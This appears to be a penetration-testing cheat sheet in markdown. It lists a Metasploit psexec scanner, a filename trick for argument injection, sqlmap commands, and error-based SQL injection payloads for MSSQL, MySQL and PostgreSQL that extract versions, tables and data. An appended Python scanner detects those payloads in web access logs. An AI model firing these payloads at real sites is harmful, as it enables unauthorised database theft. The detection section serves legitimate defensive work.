exploit-general.md

File metadata and controls

60 lines (41 loc) · 1.74 KB

General Exploitation

Windows

MSF

  • PSExec Scanner (Multi-load)
    • use auxiliary/scanner/smb/psexec_scanner

Linux

Linux File manipulation

  • Create files with weird characters (used for globbing manipulation):

    touch -- "--file-with=weird characters"

Web

SQL Injection

SQLMap

  • sqlmap -u <uri> --data "{ \"user\": \"1\"}" --tamper=charunicodeescape --dbms=<type> --technique=<technique>
    • Techniques:
      • Default - all
      • T - time based
  • sqlmap -r <file>
    • Reads the URL, method and data/parameters from a file holding a raw HTTP request (e.g. a request saved from Burp).

MSSQL

  • Error-based SQLi
    • General: or 1 in (SELECT TOP 1 CAST(query as varchar(4096))) -- -
      • Where query is anything like:
      • @@version
      • user_name()
      • db_name(0) calls master..sysdatabases
    • Get tables: or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM db..sysobjects where xtype='U' and name not in ('','')); -- -
      • Where db is the database name and ('','') is the growing list of table names already found, starting from the single blank entry '' when none are known yet.
    • Columns: db..syscolumns.name
    • Data: db..table where column not in ('')
    • Casting to varchar to trigger errors: CAST(id as varchar)+char(59) (URL-encode + as %2b if needed)
      • The value appears in the conversion error as <int-etc>; the appended char(59) (a literal ;) makes the string non-numeric, so the implicit conversion back fails and the error echoes it.

MySQL

  • Error-based SQLi
    • General: union select count(*), concat(value, floor(rand(0)*2)) as z from information_schema.tables group by z;

PostgreSQL

  • Error-based SQLi
    • General: select cast(query as numeric);
      • version()
      • (select table_name from information_schema.tables limit 1 offset x) - step x through 0, 1, 2, ... to walk the table list one row per error
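
Added here as a defender's counterpart to the error-based payloads listed above (not part of the original sheet): a small Python scanner that URL-decodes query parameters from access-log lines and flags the MSSQL CAST-to-varchar, MySQL floor(rand(0)*2)/GROUP BY and PostgreSQL CAST-to-numeric primitives. The function names, regexes and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One signature per error-based primitive from the sheet, applied to the
# URL-decoded parameter value so encoded payloads (%20, %2b, +) are caught.
SIGNATURES = {
    "mssql-cast-varchar": re.compile(r"\bcast\s*\(.*?\bas\s+varchar", re.I | re.S),
    "mysql-floor-rand-groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?\bgroup\s+by\b", re.I | re.S),
    "postgres-cast-numeric": re.compile(r"\bcast\s*\(.*?\bas\s+numeric\s*\)", re.I | re.S),
}

# Extracts the request target from a common/combined-log-format line.
REQUEST_RX = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(raw_value):
    """Return the names of every signature that matches one parameter value."""
    decoded = unquote_plus(raw_value)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_access_log(lines):
    """Return (client_ip, parameter_name, [signatures]) for each flagged parameter.
    Only the query string is inspected; POST bodies are not in access logs."""
    findings = []
    for line in lines:
        m = REQUEST_RX.search(line)
        if not m or "?" not in m.group(1):
            continue
        client_ip = line.split(" ", 1)[0]
        for pair in m.group(1).split("?", 1)[1].split("&"):
            key, _, value = pair.partition("=")
            hits = classify(value)
            if hits:
                findings.append((client_ip, key, hits))
    return findings

# Constructed sample lines (not real traffic): one benign request, then the
# three probes from the sheet in the encoded form a web server would log.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=42&sort=asc HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=1%20or%201%20in%20'
    '(SELECT%20TOP%201%20CAST(@@version%20as%20varchar(4096)))%20--%20- HTTP/1.1" 500 210',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%20union%20select%20count(*),'
    'concat(version(),floor(rand(0)*2))%20as%20z%20from%20information_schema.tables'
    '%20group%20by%20z HTTP/1.1" 500 198',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%20and%201=cast(version()'
    '%20as%20numeric) HTTP/1.1" 500 175',
]
```

Run scan_access_log over real access logs after confirming the format regex matches your server's log layout.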